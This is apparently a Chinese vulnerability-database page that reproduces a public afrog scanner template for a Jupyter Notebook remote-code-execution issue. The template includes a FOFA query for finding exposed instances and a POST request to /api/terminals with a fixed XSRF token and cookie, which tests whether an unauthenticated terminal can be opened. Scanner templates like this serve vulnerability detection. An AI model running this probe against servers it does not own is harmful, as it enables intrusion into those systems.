jupyter-notebook-rce: Jupyter Notebook RCE

日期: 2025-09-01 | 影响软件: jupyter notebook | POC: 已公开

漏洞描述

FOFA: app="Jupyter-Notebook"

PoC代码[已公开]

id: jupyter-notebook-rce

info: 
  name: Jupyter Notebook RCE
  author: xpoc
  severity: critical
  verified: true
  description: |
    FOFA: app="Jupyter-Notebook"
  tags: jupyter,rce
  created: 2023/06/22

rules:
  r1:
    request:
      method: POST
      path: /api/terminals
      headers:
        X-XSRFToken: 2|7a4faae0|819f5adf7edaef5e74502c9d0c75a604|1653492335
        cookie: _xsrf=2|7a4faae0|819f5adf7edaef5e74502c9d0c75a604|1653492335
    expression: |
      response.status == 200 && 
      response.body.bcontains(b"name") && 
      response.body.bcontains(b"last_activity")
expression: r1()

来源: https://github.com/zan8in/afrog/blob/main/pocs/afrog-pocs/vulnerability/jupyter-notebook-rce.yaml

漏洞描述

PoC代码[已公开]

相关漏洞推荐